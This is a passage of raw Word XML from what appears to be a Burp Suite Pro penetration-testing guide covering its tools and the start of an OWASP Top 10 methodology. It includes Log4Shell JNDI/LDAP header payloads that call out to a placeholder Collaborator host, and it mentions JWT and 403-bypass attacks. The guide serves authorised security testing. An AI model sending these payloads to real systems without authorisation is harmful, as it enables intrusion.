      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Collaborator is a critical feature for detecting blind/out-of-band vulnerabilities where the application response doesn't directly reveal the vulnerability. It provides a unique DNS/HTTP server that Burp injects as payloads — if the target makes a request to this server, Burp confirms the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detects: Blind SSRF, Blind SQLi (time-independent), Blind XXE, Blind XSS, RCE via DNS, Log4Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Access: Burp menu → Burp Collaborator Client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy your payload subdomain (e.g. abcdef.burpcollaborator.net)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert into vulnerable parameters — then poll for interactions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each interaction shows: type (DNS/HTTP), timestamp, source IP, and full request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Log4Shell Detection via Collaborator (CVE-2021-44228)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Inject into any header the application might log:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  User-Agent: ${jndi:ldap://YOUR_COLLAB_ID.burpcollaborator.net/a}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  X-Forwarded-For: ${jndi:ldap://YOUR_COLLAB_ID.burpcollaborator.net/a}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  X-Api-Version: ${jndi:ldap://YOUR_COLLAB_ID.burpcollaborator.net/a}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Poll Collaborator — DNS/LDAP interaction = vulnerable Log4j instance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2.6  Decoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoder transforms data between encoding and encryption formats — essential for analysing and crafting payloads in tokens, cookies, and serialised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Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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URL encode/decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Decode %2F%20 etc. from query strings and POST bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Base64 encode/decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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JWT payloads, image data, serialised Java objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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HTML encode/decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Analyse HTML entity encoding in XSS contexts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Hex encode/decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Binary data, hashes, raw byte analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Gzip decompress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Compressed response bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Smart decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Auto-detect and chain multiple encoding layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2.7  Comparer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparer performs byte-level and word-level diff between two request or response samples. Use it to identify subtle differences in responses that indicate successful exploitation — such as comparing an authenticated vs unauthenticated response, or a valid vs invalid IDOR response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Word diff: highlights changed words — good for comparing page content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Byte diff: exact byte-level differences — good for binary data, tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common use: Intruder sends 1000 responses — Comparer shows which one is different (= successful attack)</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2.8  Sequencer — Token Entropy Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sequencer tests the randomness and unpredictability of session tokens, CSRF tokens, password reset tokens, and any other security-critical values. Weak entropy means tokens can be predicted or brute-forced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auto-analysis: capture 100+ tokens, Sequencer analyses bit-level entropy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual analysis: test custom token samples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Results: FIPS test, spectral test, compression test — overall rating: Excellent/Good/Poor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Poor token entropy: map to CWE-330 (Use of Insufficiently Random Values)</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2.9  Target — Scope &amp; Site Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Site Map: hierarchical view of all discovered content — endpoints, parameters, issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope Definition: include/exclude URLs, hosts, file extensions from all Burp tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Issue Activity: issues grouped by host with severity ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Best practice: always set scope BEFORE scanning to avoid testing out-of-scope hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Scope Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Target → Scope → Add → https://targetcorp.com/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Advanced scope: use regex for subdomain matching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Exclude: /logout, /account/delete, /admin/reset — avoid destructive actions</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2.10  Extensions (BApp Store) — Must-Have Pro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Extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="266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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Autorize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IDOR / privilege escalation testing — auto-replays every request with a low-priv token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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JWT Editor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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View, decode, modify and attack JWTs — alg:none, key confusion, weak secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Auth Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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SQLiPy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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SQLMap integration — pipe Burp requests directly into SQLMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Param Miner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Discover hidden/unlinked parameters — headers, cookies, cache keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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ActiveScan++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Extends active scanner with 25+ additional checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Logger++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Advanced request/response logging with regex grep, export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Turbo Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Python-scripted HTTP engine — 10,000+ req/sec; race conditions, mass fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CSRF Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Detects missing CSRF token protections across all forms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Software Vulnerability Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Detects outdated libraries with known CVEs in responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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 Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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403 Bypasser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Attempts path normalisation, header injection to bypass 403 Forbidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Upload Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Tests file upload functionality for malicious file bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Hackvertor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Inline tag-based encoding/decoding in requests — complex payload crafting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 3: OWASP TOP 10 — COMPLETE BURP METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The OWASP Top 10 is the globally recognised standard for the most critical web application security risks. Every professional pentest is structured around these categories. Below is a complete exploitation methodology for each, using Burp Suite Pro as the primary tool.</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A01:2021 — Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control is the #1 OWASP risk. It occurs when users can act outside of their intended permissions — accessing other users' data, escalating privileges, or performing admin functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Sub-Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
